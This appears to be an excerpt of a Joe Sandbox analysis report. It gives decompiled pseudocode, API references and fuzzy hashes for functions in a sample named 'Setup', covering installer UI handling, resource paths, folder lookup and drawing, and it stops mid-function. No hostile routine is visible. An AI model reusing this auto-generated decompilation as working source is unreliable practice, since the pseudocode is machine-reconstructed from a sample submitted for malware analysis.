                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$MessagePostWindow
                                                                                                                                                              • String ID: dontAskAbort$onXBtnPress
                                                                                                                                                              • API String ID: 2663934143-2813093310
                                                                                                                                                              • Opcode ID: fdfff80750ec8eccded9bc7db14716937af7c38bb839c85cebd79bb15b6ca5a6
                                                                                                                                                              • Instruction ID: df72d657e7978b6182769af25d3421523c2893e7f1735e4823fd73f4850d1854
                                                                                                                                                              • Opcode Fuzzy Hash: fdfff80750ec8eccded9bc7db14716937af7c38bb839c85cebd79bb15b6ca5a6
                                                                                                                                                              • Instruction Fuzzy Hash: 91516C70A00208DFDB14EFA5C951BAEB7B1BF44318F10422DE611AB3D1DB799D41CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F07A0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004F07A0(intOrPtr* __ecx) {
				char _v8;
				char _v16;
				char _v20;
				WCHAR* _v32;
				char _v40;
				char _v56;
				char _v57;
				char _v58;
				intOrPtr* _v64;
				signed int _t34;
				intOrPtr _t49;
				signed int _t82;

				_push(0xffffffff);
				_push(0x507c92);
				_push( *[fs:0x0]);
				_t34 =  *0x561244; // 0xddd124f9
				_push(_t34 ^ _t82);
				 *[fs:0x0] =  &_v16;
				_v64 = __ecx;
				E00414C90();
				_v8 = 0;
				if((E004F06E0(_v64, L"brwseCntnr", E00434050( &_v20)) & 0x000000ff) != 0) {
					if((E00404920(E00404820()) & 0x000000ff) != 0 || ( *0x5bdd29 & 0x000000ff) != 0) {
						E004169E0( &_v56, L"brwseCntnr");
						_v8 = 2;
						 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x80))))(_v64, L"hideElmnt",  &_v56, 1, 0);
						_v8 = 0;
						E00417430( &_v56);
					} else {
						E004169E0( &_v40, E00404930(E00404820()));
						_v8 = 1;
						PathRemoveBackslashW(_v32);
						 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x80))))(_v64, L"setBrowse",  &_v40, 1, 0);
						_v8 = 0;
						E00417430( &_v40);
					}
					_v58 = 1;
					_v8 = 0xffffffff;
					E0040D320();
					_t49 = _v58;
				} else {
					_v57 = 0;
					_v8 = 0xffffffff;
					E0040D320();
					_t49 = _v57;
				}
				 *[fs:0x0] = _v16;
				return _t49;
			}















                                                                                                                                                              0x004f07a3
                                                                                                                                                              0x004f07a5
                                                                                                                                                              0x004f07b0
                                                                                                                                                              0x004f07b4
                                                                                                                                                              0x004f07bb
                                                                                                                                                              0x004f07bf
                                                                                                                                                              0x004f07c5
                                                                                                                                                              0x004f07cb
                                                                                                                                                              0x004f07d0
                                                                                                                                                              0x004f07f2
                                                                                                                                                              0x004f0820
                                                                                                                                                              0x004f0884
                                                                                                                                                              0x004f0889
                                                                                                                                                              0x004f08a9
                                                                                                                                                              0x004f08ab
                                                                                                                                                              0x004f08b2
                                                                                                                                                              0x004f082d
                                                                                                                                                              0x004f083d
                                                                                                                                                              0x004f0842
                                                                                                                                                              0x004f084a
                                                                                                                                                              0x004f086c
                                                                                                                                                              0x004f086e
                                                                                                                                                              0x004f0875
                                                                                                                                                              0x004f0875
                                                                                                                                                              0x004f08b7
                                                                                                                                                              0x004f08bb
                                                                                                                                                              0x004f08c5
                                                                                                                                                              0x004f08ca
                                                                                                                                                              0x004f07f4
                                                                                                                                                              0x004f07f4
                                                                                                                                                              0x004f07f8
                                                                                                                                                              0x004f0802
                                                                                                                                                              0x004f0807
                                                                                                                                                              0x004f0807
                                                                                                                                                              0x004f08d0
                                                                                                                                                              0x004f08db

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F080F
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F082D
                                                                                                                                                              • PathRemoveBackslashW.SHLWAPI(?,00000000,brwseCntnr,00000000,DDD124F9,?,?,?,?,?,?,?,00000000,00507C92,000000FF), ref: 004F084A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$BackslashPathRemove
                                                                                                                                                              • String ID: brwseCntnr$brwseCntnr$hideElmnt$setBrowse
                                                                                                                                                              • API String ID: 2946794254-14752801
                                                                                                                                                              • Opcode ID: aa4e9a2065ffbc5d84d15672093c52eb6e90488d1ec1617788d1aa26f9c84a39
                                                                                                                                                              • Instruction ID: 996e323863dc21f8ddc5e25e8d50fa9a8077a5c7caa1c71174538892715ef173
                                                                                                                                                              • Opcode Fuzzy Hash: aa4e9a2065ffbc5d84d15672093c52eb6e90488d1ec1617788d1aa26f9c84a39
                                                                                                                                                              • Instruction Fuzzy Hash: D031C570E04148ABDB08EBA5E952BFEBBB4BF54304F10416DF551A72D2DB786D04CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004C94C0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004C94C0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v530;
				short _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				char _v544;
				char _v576;
				char _v577;
				signed int _t30;
				signed int _t31;
				char _t33;
				short _t34;
				void* _t45;
				void* _t50;
				intOrPtr _t51;
				intOrPtr _t75;
				void* _t79;
				signed int _t80;

				_t79 = __esi;
				_t78 = __edi;
				_t50 = __ebx;
				_push(0xffffffff);
				_push(0x509731);
				_push( *[fs:0x0]);
				_t30 =  *0x561244; // 0xddd124f9
				_t31 = _t30 ^ _t80;
				_v20 = _t31;
				_push(_t31);
				 *[fs:0x0] =  &_v16;
				_t33 = L"res://"; // 0x650072
				_v544 = _t33;
				_t51 = M00532BB0; // 0x3a0073
				_v540 = _t51;
				_t75 =  *0x532bb4; // 0x2f002f
				_v536 = _t75;
				_t34 =  *0x532bb8; // 0x0
				_v532 = _t34;
				E00451D90(__edi,  &_v530, 0, 0x1fa);
				GetModuleFileNameW(E0042DE70(0x5c1a9c),  &_v532, 0xfe);
				E00417910( &_v544, E00434050( &_v577));
				_v8 = 0;
				E004181D0(_a8,  &_v576);
				_v8 = 0xffffffff;
				E004176E0();
				if(_a12 != 0) {
					if(_a12 != 1) {
						if(_a12 != 3) {
							E004130D0(_a8 + 4, L"/#2/BMP_");
						} else {
							E004130D0(_a8 + 4, L"/PNG/PNG_");
						}
					} else {
						E004130D0(_a8 + 4, L"/GIFS/IMG_");
					}
				} else {
					E004130D0(_a8 + 4, L"/GIFS/");
				}
				E004130D0(_a8 + 4, _a4);
				_t45 = E00416A30(_a8 + 4);
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t45, _t50, _v20 ^ _t80, _a4, _t78, _t79);
			}























                                                                                                                                                              0x004c94c0
                                                                                                                                                              0x004c94c0
                                                                                                                                                              0x004c94c0
                                                                                                                                                              0x004c94c3
                                                                                                                                                              0x004c94c5
                                                                                                                                                              0x004c94d0
                                                                                                                                                              0x004c94d7
                                                                                                                                                              0x004c94dc
                                                                                                                                                              0x004c94de
                                                                                                                                                              0x004c94e1
                                                                                                                                                              0x004c94e5
                                                                                                                                                              0x004c94eb
                                                                                                                                                              0x004c94f0
                                                                                                                                                              0x004c94f6
                                                                                                                                                              0x004c94fc
                                                                                                                                                              0x004c9502
                                                                                                                                                              0x004c9508
                                                                                                                                                              0x004c950e
                                                                                                                                                              0x004c9514
                                                                                                                                                              0x004c9529
                                                                                                                                                              0x004c9548
                                                                                                                                                              0x004c9567
                                                                                                                                                              0x004c956c
                                                                                                                                                              0x004c957d
                                                                                                                                                              0x004c9582
                                                                                                                                                              0x004c958f
                                                                                                                                                              0x004c9598
                                                                                                                                                              0x004c95b0
                                                                                                                                                              0x004c95c8
                                                                                                                                                              0x004c95e7
                                                                                                                                                              0x004c95ca
                                                                                                                                                              0x004c95d5
                                                                                                                                                              0x004c95d5
                                                                                                                                                              0x004c95b2
                                                                                                                                                              0x004c95bd
                                                                                                                                                              0x004c95bd
                                                                                                                                                              0x004c959a
                                                                                                                                                              0x004c95a5
                                                                                                                                                              0x004c95a5
                                                                                                                                                              0x004c95f6
                                                                                                                                                              0x004c9601
                                                                                                                                                              0x004c9609
                                                                                                                                                              0x004c961e

                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004C9529
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000000FE,?,?,DDD124F9), ref: 004C9548
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleName_memset
                                                                                                                                                              • String ID: /#2/BMP_$/GIFS/$/GIFS/IMG_$/PNG/PNG_$res://
                                                                                                                                                              • API String ID: 158409099-203929119
                                                                                                                                                              • Opcode ID: 25d9f2395774c197b481740858660954c230d2b3eb48ebba1b64c80e62185a25
                                                                                                                                                              • Instruction ID: 0b1c1c9f6f186164942746de259c9d6f7ab329896894dcb7d269e9c6bab858ef
                                                                                                                                                              • Opcode Fuzzy Hash: 25d9f2395774c197b481740858660954c230d2b3eb48ebba1b64c80e62185a25
                                                                                                                                                              • Instruction Fuzzy Hash: FA31AE35600209ABDB14EF54DC65BEEB7B4FF14318F00819EE81A67281DB78AB84CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F77C0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 81libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E004F77C0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _v24;
				_Unknown_base(*)()* _v28;
				signed int _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				short _v42;
				short _v44;
				char _v48;
				char _v52;
				char _v84;
				char _v85;
				intOrPtr _v92;
				signed int _t39;
				signed int _t40;
				void* _t55;
				void* _t70;
				void* _t71;
				signed int _t72;

				_t71 = __esi;
				_t70 = __edi;
				_t55 = __ebx;
				_push(0xffffffff);
				_push(0x5099bc);
				_push( *[fs:0x0]);
				_t39 =  *0x561244; // 0xddd124f9
				_t40 = _t39 ^ _t72;
				_v32 = _t40;
				_push(_t40);
				 *[fs:0x0] =  &_v16;
				_v92 = __ecx;
				_v20 = 0x80004005;
				if((E00494F20(__eflags) & 0x000000ff) != 0) {
					_v24 = GetModuleHandleW(L"shell32.dll");
					if(_v24 != 0) {
						_v48 = 0xa520a1a4;
						_v44 = 0x1780;
						_v42 = 0x4ff6;
						_v40 = 0xbd;
						_v39 = 0x18;
						_v38 = 0x16;
						_v37 = 0x73;
						_v36 = 0x43;
						_v35 = 0xc5;
						_v34 = 0xaf;
						_v33 = 0x16;
						_v28 = GetProcAddress(_v24, "SHGetKnownFolderPath");
						_v52 = 0;
						_t68 =  &_v48;
						_v20 = _v28( &_v48, 0, 0,  &_v52);
						if(_v20 >= 0) {
							E00417910(_v52, E00434050( &_v85));
							_v8 = 0;
							E004181D0(_a4,  &_v84);
							_v8 = 0xffffffff;
							E004176E0();
							_t68 = _v52;
							__imp__CoTaskMemFree(_v52);
						}
					}
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v20, _t55, _v32 ^ _t72, _t68, _t70, _t71);
			}






























                                                                                                                                                              0x004f77c0
                                                                                                                                                              0x004f77c0
                                                                                                                                                              0x004f77c0
                                                                                                                                                              0x004f77c3
                                                                                                                                                              0x004f77c5
                                                                                                                                                              0x004f77d0
                                                                                                                                                              0x004f77d4
                                                                                                                                                              0x004f77d9
                                                                                                                                                              0x004f77db
                                                                                                                                                              0x004f77de
                                                                                                                                                              0x004f77e2
                                                                                                                                                              0x004f77e8
                                                                                                                                                              0x004f77eb
                                                                                                                                                              0x004f77fc
                                                                                                                                                              0x004f780d
                                                                                                                                                              0x004f7814
                                                                                                                                                              0x004f781a
                                                                                                                                                              0x004f7826
                                                                                                                                                              0x004f782f
                                                                                                                                                              0x004f7833
                                                                                                                                                              0x004f7837
                                                                                                                                                              0x004f783b
                                                                                                                                                              0x004f783f
                                                                                                                                                              0x004f7843
                                                                                                                                                              0x004f7847
                                                                                                                                                              0x004f784b
                                                                                                                                                              0x004f784f
                                                                                                                                                              0x004f7862
                                                                                                                                                              0x004f7865
                                                                                                                                                              0x004f7874
                                                                                                                                                              0x004f787b
                                                                                                                                                              0x004f7882
                                                                                                                                                              0x004f7894
                                                                                                                                                              0x004f7899
                                                                                                                                                              0x004f78a7
                                                                                                                                                              0x004f78ac
                                                                                                                                                              0x004f78b6
                                                                                                                                                              0x004f78bb
                                                                                                                                                              0x004f78bf
                                                                                                                                                              0x004f78bf
                                                                                                                                                              0x004f7882
                                                                                                                                                              0x004f7814
                                                                                                                                                              0x004f78cb
                                                                                                                                                              0x004f78e0

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(shell32.dll,DDD124F9,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004F7807
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004F785C
                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,00000000,00000000), ref: 004F78BF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleModuleProcTask
                                                                                                                                                              • String ID: C$SHGetKnownFolderPath$s$shell32.dll
                                                                                                                                                              • API String ID: 1393578788-539164948
                                                                                                                                                              • Opcode ID: 5be4f2d74f91c04d130ad8ccf2419b72b710bf666f463a8863b815463e16b97a
                                                                                                                                                              • Instruction ID: e438083bd470e43fbfbae12d09a7b573e632ec96e71d2f730542e86923fc3637
                                                                                                                                                              • Opcode Fuzzy Hash: 5be4f2d74f91c04d130ad8ccf2419b72b710bf666f463a8863b815463e16b97a
                                                                                                                                                              • Instruction Fuzzy Hash: 7F313771D042499BDB00DFE8D949BEEBBB4AF19314F00462DE511BB2D1DB785A08CBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040F720 Relevance: 12.1, APIs: 8, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040F720(intOrPtr _a4, signed int _a12, struct HDC__** _a16) {
				struct tagRECT _v20;
				struct HDC__* _v24;
				struct HBITMAP__* _v28;
				void* _v32;

				if(_a16 == 0) {
					return 0x80004003;
				}
				if(( *(_a4 + 0x30) & 0x000000ff) != 0) {
					 *_a16 = E0040F700(_a4 - 0x28);
					if( *_a16 != 0) {
						 *(_a4 + 0x30) = 0;
						if((_a12 & 0x00000001) == 0) {
							E00416BC0(_a4 - 0x28,  &_v20);
							if((_a12 & 0x00000004) != 0) {
								_v24 = CreateCompatibleDC( *_a16);
								if(_v24 != 0) {
									_v28 = CreateCompatibleBitmap( *_a16, _v20.right - _v20.left, _v20.bottom - _v20.top);
									if(_v28 != 0) {
										_v32 = SelectObject(_v24, _v28);
										if(_v32 != 0) {
											DeleteObject(_v32);
											 *(_a4 + 0x2c) =  *_a16;
											 *_a16 = _v24;
										} else {
											DeleteObject(_v28);
											DeleteDC(_v24);
										}
									} else {
										DeleteDC(_v24);
									}
								}
							}
							if((_a12 & 0x00000002) != 0) {
								FillRect( *_a16,  &_v20, 6);
							}
							return 0;
						}
						return 0;
					}
					return 0x80004005;
				} else {
					return 0x80004005;
				}
			}







                                                                                                                                                              0x0040f72a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040f72c
                                                                                                                                                              0x0040f73f
                                                                                                                                                              0x0040f759
                                                                                                                                                              0x0040f761
                                                                                                                                                              0x0040f770
                                                                                                                                                              0x0040f77a
                                                                                                                                                              0x0040f78d
                                                                                                                                                              0x0040f798
                                                                                                                                                              0x0040f7aa
                                                                                                                                                              0x0040f7b1
                                                                                                                                                              0x0040f7cd
                                                                                                                                                              0x0040f7d4
                                                                                                                                                              0x0040f7f0
                                                                                                                                                              0x0040f7f7
                                                                                                                                                              0x0040f813
                                                                                                                                                              0x0040f821
                                                                                                                                                              0x0040f82a
                                                                                                                                                              0x0040f7f9
                                                                                                                                                              0x0040f7fd
                                                                                                                                                              0x0040f807
                                                                                                                                                              0x0040f807
                                                                                                                                                              0x0040f7d6
                                                                                                                                                              0x0040f7da
                                                                                                                                                              0x0040f7da
                                                                                                                                                              0x0040f7d4
                                                                                                                                                              0x0040f7b1
                                                                                                                                                              0x0040f832
                                                                                                                                                              0x0040f840
                                                                                                                                                              0x0040f840
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040f846
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040f77c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040f741
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040f741

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7790f0f0a47ac65401f1fb5780a7dd394661dcc84927e9e266b1b9cad848c9df
                                                                                                                                                              • Instruction ID: 016c94314b8a7c7c4dc36120d6fae83ce340dfe948184dbdff37145c959fcf1d
                                                                                                                                                              • Opcode Fuzzy Hash: 7790f0f0a47ac65401f1fb5780a7dd394661dcc84927e9e266b1b9cad848c9df
                                                                                                                                                              • Instruction Fuzzy Hash: E8414175900109DFDB14DFA8D988AAF77B5FB49300F108539E906AB350C738ED45CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040DE30 Relevance: 10.9, APIs: 7, Instructions: 413COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0040DE30(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, struct HWND__* _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed char _v17;
				void* _v24;
				signed char _v25;
				char _v32;
				signed int _v36;
				void* _v40;
				long _v44;
				char _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v80;
				char _v96;
				intOrPtr* _v100;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr* _v112;
				intOrPtr* _v116;
				signed int _t183;
				void* _t189;
				void* _t236;
				void* _t245;
				void* _t275;
				intOrPtr* _t283;
				intOrPtr* _t368;
				void* _t401;
				void* _t402;
				signed int _t403;

				_t402 = __esi;
				_t401 = __edi;
				_t275 = __ebx;
				_push(0xffffffff);
				_push(0x514ce0);
				_push( *[fs:0x0]);
				_t183 =  *0x561244; // 0xddd124f9
				_push(_t183 ^ _t403);
				 *[fs:0x0] =  &_v16;
				if(_a20 != 0) {
					 *_a20 = 0;
					_v24 = 1;
					_v17 = 0;
					E00412660(_a4 - 0x24);
					if( *((intOrPtr*)(_a4 - 0x20)) != 0 &&  *((intOrPtr*)(_a4 - 0x20)) != _a12) {
						E0040DD20(_a4 - 0x20, 0, 0, 0x507);
						E0040DDE0(_a4 - 0x24);
					}
					if(IsWindow(_a12) == 0) {
						L55:
						_t189 = _v24;
						goto L56;
					}
					if( *((intOrPtr*)(_a4 - 0x20)) != _a12) {
						E0040D210(_a4 - 0x24, _a12);
						_v17 = 1;
					}
					_t365 = _a4;
					if( *((intOrPtr*)(_a4 + 0xa8)) == 0) {
						if(E0040D250(_t275, _a4 - 0x20, _t365, _t401, _t402) == 0) {
							 *((intOrPtr*)(_a4 + 0xa8)) = GetSysColor(5);
						} else {
							 *((intOrPtr*)(_a4 + 0xa8)) = GetSysColor(0xf);
						}
					}
					_v25 = 0;
					_v24 = E004F0010(_t275, _a20, _t401, _t402, _a8, 0x53bab4, _a20,  &_v25, _a32);
					if(_v24 >= 0) {
						_v24 = E0040D6B0(_a4 - 0x24,  *_a20, 0, _a16);
					}
					_t283 = _a24;
					_t368 = _a4 + 0x5c;
					 *_t368 =  *_t283;
					 *((intOrPtr*)(_t368 + 4)) =  *((intOrPtr*)(_t283 + 4));
					 *((intOrPtr*)(_t368 + 8)) =  *((intOrPtr*)(_t283 + 8));
					 *((intOrPtr*)(_t368 + 0xc)) =  *((intOrPtr*)(_t283 + 0xc));
					if(_v24 >= 0 &&  *_a20 != 0 && _a28 != 0) {
						E00414CE0( *_a20, _a28, _a4 + 0x5c, _a4 + 0x70);
					}
					if(_v24 < 0 || (_v25 & 0x000000ff) == 0 ||  *_a20 == 0) {
						L49:
						if(_v24 < 0 || (E00412640(_a4 + 0x3c, 0) & 0x000000ff) != 0) {
							E00412660(_a4 - 0x24);
							if( *((intOrPtr*)(_a4 - 0x20)) != 0) {
								E0040DD20(_a4 - 0x20, 0, 0, 0x507);
								if(_v24 < 0 && (_v17 & 0x000000ff) != 0) {
									E0040DDE0(_a4 - 0x24);
								}
							}
						}
						goto L55;
					} else {
						if((E00416C00(_a4 - 0x20) & 0x00300000) != 0) {
							_v36 = E00416C00(_a4 - 0x20);
							E00415FF0(_a4 - 0x20, 0xfffffff0, _v36 & 0xffcfffff);
							E00416C20(_a4 - 0x20, 0, 0, 0, 0, 0, 0x37);
						} else {
							 *(_a4 + 0xbc) =  *(_a4 + 0xbc) | 0x00000008;
						}
						E00417520( *_a20);
						_v8 = 0;
						if(( *_a8 & 0x0000ffff) == 0x4d || ( *_a8 & 0x0000ffff) == 0x6d) {
							if((_a8[1] & 0x0000ffff) == 0x53 || (_a8[1] & 0x0000ffff) == 0x73) {
								if((_a8[2] & 0x0000ffff) == 0x48 || (_a8[2] & 0x0000ffff) == 0x68) {
									if((_a8[3] & 0x0000ffff) == 0x54 || (_a8[3] & 0x0000ffff) == 0x74) {
										if((_a8[4] & 0x0000ffff) == 0x4d || (_a8[4] & 0x0000ffff) == 0x6d) {
											if((_a8[5] & 0x0000ffff) == 0x4c || (_a8[5] & 0x0000ffff) == 0x6c) {
												if((_a8[6] & 0x0000ffff) != 0x3a) {
													goto L45;
												}
												_t236 = E00414FD0(_a8);
												_t96 = _t236 - 0xe; // -14
												_v44 = _t236 + _t96;
												_v40 = GlobalAlloc(0x42, _v44);
												if(_v40 == 0) {
													_v24 = 0x8007000e;
												} else {
													E00414C90();
													_v8 = 1;
													_v52 = GlobalLock(_v40);
													E004112E0(_t275, _v52, _v44,  &(_a8[7]), _v44);
													GlobalUnlock(_v40);
													_t245 = _v40;
													__imp__CreateStreamOnHGlobal(_t245, 1, E00434050( &_v48));
													_v24 = _t245;
													if(_v24 >= 0) {
														E00414C90();
														_v8 = 2;
														_v100 = E0041D530( &_v32);
														_v24 =  *((intOrPtr*)( *((intOrPtr*)( *_v100))))(_v100, 0x53bad4, E00434050( &_v56));
														if(_v24 >= 0) {
															_v104 = E0041D530( &_v56);
															_v24 =  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x14))))(_v104, E0041D530( &_v48));
														}
														_v8 = 1;
														E0040D320();
													}
													_v8 = 0;
													E0040D320();
												}
												goto L48;
											} else {
												goto L45;
											}
										} else {
											goto L45;
										}
									} else {
										goto L45;
									}
								} else {
									goto L45;
								}
							} else {
								goto L45;
							}
						} else {
							L45:
							E00414C90();
							_v8 = 3;
							_v108 = E0041D530( &_v32);
							 *((intOrPtr*)( *((intOrPtr*)( *_v108))))(_v108, 0x53bb34, E00434050( &_v60));
							if(E0041D530( &_v60) != 0) {
								E00416A10( &_v80);
								_v8 = 4;
								E004169E0( &_v96, _a8);
								_v8 = 5;
								_v112 = E0041D530( &_v60);
								 *((intOrPtr*)( *((intOrPtr*)( *_v112 + 0xa4))))(_v112, 0xffffffff);
